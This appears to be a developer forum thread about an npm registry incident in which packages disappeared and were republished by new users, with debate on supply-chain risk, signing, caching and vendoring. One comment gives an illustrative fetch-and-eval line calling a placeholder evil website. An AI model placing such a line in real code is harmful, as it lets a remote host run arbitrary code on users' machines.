I think the (short) answer is "node, npm, and javascript".
The longer answer has something to do with the automatic installation of dependencies, and the common use of shell scripts downloaded directly off the internet and executed using the developer's or sysadmin's user account.
I used to use CPAN all the time. CPAN would check dependencies for you, but if you didn't have them already you'd get a warning and you'd have to install them yourself. It forced you to be aware of what you're installing, and it applied some pressure on CPAN authors to not go too crazy with dependencies (since they were just as annoyed by the installation process as everyone else.)
These days I use NuGet a lot. It does the dependency installation for you, but it asks for permission first. The dialogs could be better about letting you learn about the dependencies before saying they're ok. (In general, NuGet's dialogs could be a lot better about package details.)
I think CPAN is pretty sweet for variety/wide reach of packages available, but this is flat-out wrong.
CPAN is not a package manager; it is a file sprayer/script runner with a goal of dependency installation. That's perfectly sufficient for a lot of use cases, but to me "package manager" means "program that manages packages of software on my system", not the equivalent of "curl cpan.org/whatever | sh".
CPAN packages can (and do by very common convention) spray files all over the place on the target system. Then, those files are usually not tracked in a central place, so packages can't be uninstalled, packages that clobber other packages' files can't be detected, and "where did this file come from?"-type questions cannot be answered.
Whether CPAN or NPM "force you to be aware of what you're installing" seems like the least significant difference between the tools. When NPM tells you "I installed package 'foo'", it almost always means that the only changes it made to your system were in the "node_modules/foo" folder, global or not. When CPAN tells you "I installed package 'foo'" it means "I ran an install script that might have done anything that someone named 'foo'; hope that script gave you some verbose output and told you everything it was doing! Good luck removing/undoing its changes if you decide you don't want that package!"
There are ways around all of those issues with CPAN, and plenty of tools in Perl distribution utilities to address them, but they are far from universally taken advantage of. CPAN is extremely unlike, and often inferior to, NPM. Imagine if NPM packages did all of their installation logic inside a post-install hook; that's more like a CPAN distribution.
Whereas a lot of npm modules are relatively small - some tiny - and have their own dependencies. So a simple "npm install blah" command can result in dozens of packages being installed. Dealing with that manually would, in fairness, be a giant chore.
Now of course there's a discussion to be had about whether thousands of weeny little modules is a good idea or not but, to be honest, that's a religious debate I'd rather steer clear of.
CPAN has a setting that force-feeds you dependencies without asking, but I don't think it's on by default. Also, CPAN runs tests by default, which usually takes forever, so users get immediate feedback when packages go dependency-crazy. The modern Perl ecosystem is often stupidly dependency-heavy, but nothing like Node.
Fast forward to angular 2, and we're down to two developers who are still for it.
Fast forward to today, I'm down to one angular dev who's still for it, and two of the original three have left for react jobs. Meanwhile, I'm left with a bunch of angular 1 code that needs to be upgraded to angular 2, and a few testing-out-angular-2 projects that are dependency hell.
The only reason I ultimately embraced angular 1 to begin with (above reasons aside), was because it was so opinionated about everything, I could throw it at my weaker developers and say: "just learn the angular way to do it", and there was very little left they could meaningfully screw up. Angular proponents on the team would see it as a point of expertise to teach the "angular way" to more junior devs, and everyone left the day feeling good.
When it comes to Javascript 95% difficulty with writing good maintainable code is ensuring that your team is all writing to a very exact, and consistent quality and style, since there are so many different ways you can write js, and so many potential pitfalls. And if the team all wants to embrace Google's Angular standard, that works for me. Its far easier to be able to point to an ecosystem with an explicit, opinionated way of writing code, than it is to continuously train people on how to write maintainable code otherwise.
But with angular 2, if you haven't been drinking to cool-aid for a while now, it requires so much knowledge just to get running, I can't even have junior devs work on it, without a senior dev who's also an angular fanboy there to make sure everything is set up to begin with. Its absurd. And I'm supposed to sell to the business that we need to migrate all my Angular 1 code to this monstrosity? And then spend time again every 6 months making the necessary upgrades to stay up to date? Get real.
Kidding - but we had exactly the same problem, except with a React app rather than an Angular one just before Christmas.
No joke on with this statement though: every time we have a time-consuming build issue to deal with it comes down to some npm dependency problem. Honestly, if there were a way we could realistically ditch npm (NO! YARN IS NOT ANY BETTER - to preempt that suggestion - it's simply an npm-a-like) I'd happily do so but sadly there isn't.
Not sure why you’re stuck on the number of deps either - as long as they’re small who cares?
Other languages and package management systems don't encourage this kind of insanity.
This is not possible, you ask?
In fact, JS/CSS is the most viable of all the stacks to move forward. Let's use the "advantage" that any JS library/ecosystem die fast and put enough hipster propaganda declaring the ultimate solution.
Is too hard? JS is so bad that fix it is too easy. You only need more than the week it originally take to build it.
I think the software version of this is: any system with more structure than your program is an over-engineered monstrosity, and any system with less structure than your program is a flakey hack.
I don't use npm or node for anything serious, and i don't really have any knowledge of how NPM works, but this isn't the first time i've read this story of a whole bunch of packages disappearing and everybody's builds breaking. If everything is a house of cards, then why don't i hear the same stories about PyPI or gems or crates?
I really would love to ditch web dev and all its myriad tendrils, and go back to native desktop software.
Example: https://www.npmjs.com/package/duplexer3 which has 4M monthly downloads just reappeared, published by a fresh npm user. They published another two versions since then, so it's possible they've initially republished unchanged package, but now are messing with the code.
Previously the package belonged to someone else: https://webcache.googleusercontent.com/search?q=cache:oDbrgP...
I'm not saying it's a malicious attempt, but it might be and it very much looks like. Be cautious as you might don't notice if some packages your code is dependent on were republished with a malicious code. It might take some time for NPM to sort this out and restore original packages.
> duplexer3@1.0.1 install /Users/foo/Code/foo/node_modules/duplexer3 > echo "To every thing there is a season, and a time to every purpose under the heaven: A time to be born, and a time to die; a time to plant, and a time to pluck up that which is planted; A time to kill, and a time to heal; a time to break down, and a time to build up; A time to weep, and a time to laugh; a time to mourn, and a time to dance; A time to cast away stones, and a time to gather stones together; a time to embrace, and a time to refrain from embracing; A time to get, and a time to lose; a time to keep, and a time to cast away; A time to rend, and a time to sew; a time to keep silence, and a time to speak; A time to love, and a time to hate; a time of war, and a time of peace. A time to make use of duplexer3, and a time to be without duplexer3."
To every thing there is a season, and a time to every purpose under the heaven: A time to be born, and a time to die; a time to plant, and a time to pluck up that which is planted; A time to kill, and a time to heal; a time to break down, and a time to build up; A time to weep, and a time to laugh; a time to mourn, and a time to dance; A time to cast away stones, and a time to gather stones together; a time to embrace, and a time to refrain from embracing; A time to get, and a time to lose; a time to keep, and a time to cast away; A time to rend, and a time to sew; a time to keep silence, and a time to speak; A time to love, and a time to hate; a time of war, and a time of peace. A time to make use of duplexer3, and a time to be without duplexer3.
Given that there's hints, at least, that the problems were caused by some particular developer's actions, I wonder about the security model for package-managed platforms altogether now. If I were a big cybercrime ring, the first thing I'd do would be, get a bunch of thugs together and knock on the front door of a developer of a widely-used package; "help us launch [the sort of attack we're seeing here] or we'll [be very upset with you] with this wrench." Is there a valid defense for a platform whose security relies on the unanimous cooperation of a widely-scattered developer base?
But your point about pressuring or bribing package authors still stands as a scary issue. Similar things have already happened: for example, Kite quietly buying code-editor plugins from their original authors and then adding code some consider spyware (see https://news.ycombinator.com/item?id=14902630). I believe there were cases where a similar thing happened with some Chrome extensions too...
Although, I've never considered this in the case of an actual attack. It would make sense to actually fingerprint the entire source tree and record this too somewhere, so when you build it you know you are getting the right thing. Teapot basically defers this to git.
The defense is staged deployment and active users. This obviously depends on the blutness of the malicious code.
If I may assume easily noticed effects of the malicious code: A dev at our place - using java with maven - would update the library, his workstation would get owned. This could have impacts, but if we notice, we'd wipe that workstation, re-image from backup and get in contact with sonatype to kill that version. This version would never touch staging, the last step before prod.
If we don't notice on the workstation, there's a good chance we or our IDS would notice trouble either on our testing servers or our staging servers, since especially staging is similar to prod and subject to load tests similar to prod load. Once we're there, it's back to bug reports with the library and contact with sonatype to handle that version.
If we can't notice the malicious code at all until due to really really smart activation mechanisms... well then we're in NSA conspiracy land again.
EDIT: That would be a massive security problem!
long discussion here: https://github.com/node-forward/discussions/issues/29
If you're going to have clients specify a signature anyway, then you don't need to sign packages, you just need strong one way hash function, like SHA-1024 or something. User executes "pkg-mgr install [package name] ae36f862..."
Either way, every tutorial using npm will become invalid.
> Once you've yanked all versions of a gem, anyone can push onto that same gem namespace and effectively take it over. This way, we kind of automate the process of taking over old gem namespaces.
This isn't a standard practice in JS world?
It might not be as standard a practice in the Java world as you think.
Relying on npm, Atlassian/GitHub etc really hurts when stuff like this happens. Issues always gets resolved, but cases such as the GitLab incident should be enough to always keep some local copies around.
Granted, we do depend on bitbucket. However, I am honestly scared to self-host our code. This is a small but old shop, so the entire code base is easily several million dollars worth in man-hours alone. And then again, it's git, so if push comes to shove, we could easily and quickly spin up an internal gitlab instance and push our stuff there to get back up.
Install an instance of Sonatype Nexus, create a proxy-repo for npm (and Maven if you also use Java) and that's it.
What, however, won't be caught is Docker (because that crap insists on directly talking to the Dockerhub servers, which is a giant security hole waiting to happen) and PHP composer (because it likes to pull dependencies via git from GH, so no caching there).
You also can require image signing such that if an image is signed by an untrusted party it will fail.
At some point you have to trust a third party. Even if you run your own hardware, you still depend on power and internet provided by someone else. And unless you are a massive company, time is typically spent much better on other things than hosting your own NPM packages and git repos.
I don't think there is any part of my little software empire that is dependant on code for which I don't have the source or underlying .dll checked into source control.
It's part of your project. You absolutely need a copy of it.
These are building blocks in a normal dev environment, and it would take me massive amounts of time to manage everything on my own.
The local copies are fragile and not as easily shared.
Having a redundant array of independent cloud providers seems the ideal state. This is the most effective way to provide a single source of truth without it becoming a single point of failure.
Even if the answer is “yes, 1+ packages were hijacked by not-the-original author, but we’re still investigating if there was malware”, tell people immediately. Don’t wait a few days for your investigation and post mortem if it’s possible that some users’ systems have already been compromised.
@seldo, I understand that you don't want to disseminate misleading info, but an abundance of caution seems warranted in this case as my understanding of the incident lines up with what @yashap has said. If we're wrong, straighten us out --- if we're not, please sound an advisory, because this is major.
Yarn (which is an alternative to npm) uses a global cache [1] on your machine which speeds things up, but probably also protects you from immediate problems in cases like the one currently on progress (because you would probably have a local copy of e.g. require-from-string available).
A major reason for the high toolchurn in that ecosystem is how many of those tools are not designed from the ground up, don't quite solve the things they ought to, or solve them in really weird ways (due to the low barrier of entry partly). But that doesn't mean all of it deserves that label.
Do you also insist that Chrome and Firefox shouldn't exist because IE does the job adequately?
Packages that are published should be immutable, just like in maven repo case.
Then it happened again not two months after left-pad. And now it happened again.
http://blog.npmjs.org/post/168978377570/new-package-moniker-...
Other than that, their reaction to similar incidents was to wait for somebdoy on twitter to notify them, ban the responsible users, and hope that it won't happen again. It's still extremely exploitable and there are surely many other novel ways of installing malware using the repository that we haven't even heard of yet. The NPM security team is slow to act and sadly doesn't think ahead. They're responsible for one of the largest software ecosystems in the world, they should step up their game.
In my company we take the stable version of the library we want to use and we self-host it. We basically have added a cache that we manage and control what goes into it instead of just trusting a manager. Especially for server-side deployment this is mandatory for security. Things like let's say ffmpeg etc - we never get from random packages but we host them ourselves.
"Harvesting credit card numbers and passwords from websites"
https://news.ycombinator.com/item?id=16084575
If you self-host a stable version, you'll have some time to hear about potential problems in a new version before updating it.
I share your concern. It's a tradeoff: tools that do this are very convenient, and the people who have thought about it have decided in some cases that convenience outweighs the security or stability aspects. And people can make that determination on a case-by-case basis.
Bleeding-edge packages from possibly compromised hosts, or self-hosted old versions with potential bugs, security issues, and hard-to-find documentation.
Pick your poison, unless you're Red Hat and can spend the time to backport security/bug fixes and maintain a knowledge base for your old versions.
There's multiple ways to solve to mitigate the risk, but committing libraries in to source control can cause way more headaches than it prevents IMO.
There are advantages to checking in all your deps, but many drawbacks as well (especially for an interpreted language; something like Go avoids a few of these):
- Incredibly slow SCM operations unless you use the perfect options every time (good luck, new devs). I've experienced this with Perforce and Git, and hoo boy does a "get three cups of coffee while you wait"-time diff/commit operation throw a hitch in your plans.
- You need either very good discipline about updating just a few packages at a time (good luck when cascading dependencies that are shared at multiple levels of the tree update), or incredibly huge, confusing diffs to read when you update stuff.
- Actually understanding the diffs you read when packages get updated. Packages updated to do things like 'http.get("$evil_website", (r) => eval(r))' are only a tiny fraction of the malicious or dangerous code you'll see in package updates.
- Hassles with regards to compiled dependencies. You have to filter them out of source control (can be a hassle to find all the places they live), or remember to rebuild when changing OS versions/stdlib versions/runtime versions/architectures/etc. That can get pretty annoying, especially since in my experience each "runtime loaded" compiled dependency gives you many completely different, utterly unintelligible errors when it's used in an environment where it should be rebuilt.
It is better to use content hashes and a system that distributes and enforces these, like IPFS.
Someone could just create some hooks for https://github.com/whyrusleeping/gx and we would have it done.
There are lots of other structures that work like this. Git is one - when git fetches a branch, git will check whether the remote branch includes all the commits it saw last time it fetched, or some are missing. (By default this is non-fatal but tends to produce warnings/errors when you try to actually use the replaced branch, but you can easily make this fatal.) Another good one is the style of Merkle trees used in Certificate Transparency: there's no proof-of-work, so the trees are small, but they still include a cryptographic hash of each previous tree so you can detect if something has gone missing.
The other relevant property of the blockchain is that it's not a reference to data elsewhere, it (like git) actually contains all the data that's ever been on the blockchain, and you need that data to verify the blockchain properly. This may or may not be what you want for a programming language package manager; it means that in order to set up a new development environment, you have to download every version npm package that ever existed. It does accomplish the goal of preventing things from being removed, but it's pretty heavy-weight.
> Beginning at 18:36 GMT today, 106 packages were made unavailable from the registry. 97 of them were restored immediately. Unfortunately, people published over 9 of them, causing delays in the restoration of those 9. We are continuing to clean up the overpublications. All installations that depend on the 106 packages should now be working.
Hard to believe less than a hundred packages cause so many issues. NPM's dependency hierarchy is pretty insane.
Ever heard of glibc?
Unfortunately with NPM this is still awkward, because as soon as you try to shrinkwrap your project, it doesn't just pin the version numbers, it also pins the full source location. That's in direct conflict with (and apparently takes precedence over) using one of the local caching proxies that would otherwise be a useful practical solution to this problem, and the situation gets even more complicated if you have people building at multiple locations and want each to have their own proxy.
Yarn seems to have a better approach to this. It has a few problems of its own, notably surprising, quiet updates to the lock file when using the default options (IMHO a mistake since the big selling point of Yarn is its deterministic, reproducible behaviour) but at least you can do something resembling a local cache combined with something resembling version pinning, which is the ante for any sane build system.
https://github.com/npm/registry/issues/255
Be part of the history :)
EDIT: there are now over 1100 comments/memes.
... Or it did. I received a harshly worded letter from npm saying they axed it. It hit all the talking points about inclusiveness and making sure no one feels even slightly annoyed.
Meh. No point to this story. Just an interesting situation with an inconsistently curated package manager. I was surprised there was an unofficial undocumented banlist.
https://www.npmjs.com/policies/conduct
I guess lots of people will think that a policy like Avoid using offensive or harassing package names, nicknames, or other identifiers that might detract from a friendly, safe, and welcoming environment for all. stifles their inner something or other though.
If they take that down the Nazí one but not the Fabiano one, you can then take your mischief making to the next level by accusing them of being misogynists for banning a package promoting a woman chess champion but leaving up the one for the man.
> We made history! Fastest issue to reach 1000 comments, in just 2 hours.
> cheers everyone, nice chatting with you. 17 away from hitting 1000 btw!
> Is GitHub going to die with the volume of comments?
Kind of disappointed the NPM community is turning github into reddit right now.
There is currently no way for a user to remove their own packages or unpublish packages anymore from the public NPM API ( a change following the `left-pad` incident ).
This leads me to believe this was an internal NPM error. My guess is employee error.
Yeah, it definitely exists: https://docs.npmjs.com/cli/unpublish
A quote from the documentation page you linked:
> With the default registry (registry.npmjs.org), unpublish is only allowed with versions published in the last 24 hours. If you are trying to unpublish a version published longer ago than that, contact support@npmjs.com.
Store all of your dependencies locally.
If something disappears then at least you can continue until you find a replacement.
It seems to me that if packages "disappear" from upstream, it shouldn't have any effect other than preventing an update due to the missing dependency.
- The missing packages can be replaced by someone who wasn't the original package author (e.g. a malicious hacker) - It's not easy to catch this ^^^ because NPM doesn't have support for signing versions in your project's dependency configuration... (I bet it will after this.) - Almost every modern website has a dependency on NPM somewhere in their build chain - NPM being down means loads of sites can't deploy properly
So yeah. This may be a really big deal.
They should take a good hard look at NuGet, which does not allow packages to be deleted so builds are guaranteed to be reliable. Still doesn't hurt to locally cache packages with software such as Klondike.
http://blog.npmjs.org/post/169432444640/npm-operational-inci...
TL;DR: "no malicious actors were involved in yesterday’s incident, and the security of npm users’ accounts and the integrity of these 106 packages were never jeopardized."
A more detailed report will follow in the next days.
https://github.com/mohsen1/json-formatter-js/pull/58#issueco...
This wouldn't fix the issue of someone deleting the actual package (this happened here?), but it would prevent some malicious code being installed if someone uses the same package name.
Edit: grammar
Which means that it's not a technical difference. Maybe Central has been compromised/had issues before, just long ago (it's certainly much older). Maybe there are things wrong with NPM-as-a-company even if NPM-as-a-technology is fine. Maybe it's just luck.
But "stays there until nuclear fire immolates the Earth" sounds a bit much like "this ship is completely unsinkable" for my liking.
Kind of funny how shitty modern technology is. But I heard a quote recently that kind of explains it: "The more sophisticated something is, the easier it is to break it."
What are the open-source / self-hosting options here? It gets a little messy with all the sub-dependencies, doesn't it?
NPM already allows using git repos, but needs some tweaks to allow better support:
* allow versioning via git tags
* store git commit in `package-lock.json`.
* maybe something else...
You can reference commits in package.json already.
From [1]:
> With the default registry (registry.npmjs.org), unpublish is only allowed with versions published in the last 24 hours. If you are trying to unpublish a version published longer ago than that, contact support@npmjs.com.
I am kinda assuming that if npm support were to help you unpublish a package that is depended upon (they might refuse), they would prevent someone else from re-publishing to that name (they might put up their own placeholder package, like they did during the left-pad incident), but granted I can't find this stated anywhere.
I think the reason re-publishing seemed to happen in this case was they weren't prepared for whatever vector allowed for the deletion of these packages.
http://blog.npmjs.org/post/163723642530/crossenv-malware-on-...
I can't even install webpack-dev-server. Because this package is missing.
EDIT: it's back
[1]: https://stackoverflow.com/questions/48131550/nodemon-install...
"
I think npm has been a headache for everyone at some point, which is one of the main reasons I started contributing to Yarn. I think npm has done a lot of good work in the past year to respond to the necessary change, so kudos to them for their work; however, it's nowhere near the rock-solid package manager that we need. If the Javascript ecosystem is to ever be taken seriously, and not as a toy -- it has to have more reliability.
Ergonomically, I currently thing it's ahead of many other package managers because of how simple it is to get running. The number of "gotcha's" after npm install is nothing to shake a stick at, though.
One of the things you can do to get builds that aren't as suspect to npm registry issues is configuring an offline mirror [1].
From the post:
"Repeatable and reliable builds for large JavaScript projects are vital. If your builds depend on dependencies being downloaded from network, this build system is neither repeatable nor reliable.
One of the main advantages of Yarn is that it can install node_modules from files located in file system. We call it “Offline Mirror” because it mirrors the files downloaded from registry during the first build and stores them locally for future builds.
"- https://github.com/elsehow/gx-js
- https://github.com/ipmjs/ipmjs
Node.js package manager SHOULD BE COMMUNITY OWNED/DRIVEN
You should also not be cowboy updating things just because there is an update.
1. Allow a single package file, including multiple clauses (or sub-files, whatever) for different languages. Let me manage my Angular front-end and Flask back-end in the same file. A single CLI tool as well - Composer and Bower aren't all that different.
2. Be the trusted broker, with e.g. MD5 checking, virus scanning, some kind of certification/badging/web of trust thing. Let developers know if it's listed, it's been vetted in some way.
3. Allow client-side caching, but also act as a cache/proxy fetch for package retrieval. That way, if Github or source site is down, the Internet doesn't come to a screeching halt. I see the value of Satis, but it's a whole additional tool to solve just one part of this one problem.
4. Server-side dependency solver. Cache the requests and give instant answers for similar requests. All sorts of value-adds in analytics here, made more valuable by crossing language boundaries.
5. Act as an advocate for good semver, as part of the vetting above.
NOTE: These features are not all-or-nothing, I believe there's value from implementing each one on its own. Also note that nothing here should lock people into one provider for these services. There's a market to be made here.
http://magarshak.com/blog/?tag=identity
Well, Q allows you to choose between “each individual publishes their own stream” and some degree of “centralized publishing” by management teams of groups. So who should publish a stream, the individual or the group?
If the individual - the risk is that the individual may have too much power over others who come to rely on the stream. They may suddenly stop publishing it, or cut off access to everyone, which would hurt many people. (I define hurt in terms of needs or strong expectations of people that form over time.)
If the group - then managers may come and go, but the risk is that if the group is too big, it may be out of touch with the individuals. The bigger risk is that the individuals are forced to go along with the group, which may also create a lot of frustration. For instance, the group may give rise to into three sub-groups. They are deciding where to go, but some people want to go bowling, others want to go to the movies, others want to volunteer in a soup kitchen. Even though everyone belongs to the group. Who should publish these activities?
So I think when it comes to publishing streams that others can join, there should be some combination of groups and individuals. And it should reflect the best practices of what happens in the real world: one person starts a group that may later become bigger than him. Then this group grows, gets managers etc. After a while this person may leave. In the future, other individuals may want to start their own groups and invite some members of the old group to join. They may establish relationships between each other, subscribe to each other’s streams, pay each other money, etc.
See https://github.com/npm/registry/issues/255 for details.
Very annoying, breaks builds all over, also prevents installing react-native.
If this was only a matter of missing packages, this would "only" be a matter of breaking builds.
But it looks like third parties were able to take over the missing packages, see https://github.com/npm/registry/issues/256 - which is a HUGE deal, considering "npm install" blindly executes the scripts in a package's preinstall property (as well as the packaged module itself possibly containing arbitrary backdoors)
The caret syntax for auto-upgrading to the next minor version is the open door to a world of bullshit.
Vendor your dependencies that are needed to run build your applications. Period.
What an ecosystem we have built.
I wish I'd taken his advice as there are a couple of JAR files that I can no longer update.
HN: Shrinkpack – npm dependencies as tarballs, prevents “left-pad” style breakage - https://news.ycombinator.com/item?id=11353908
Wonder if npm, Inc. would view a decentralized registry as a threat to their business model?
https://github.com/npm/registry/issues/255#issuecomment-3557...
It defeats the entire purpose of using a public repository.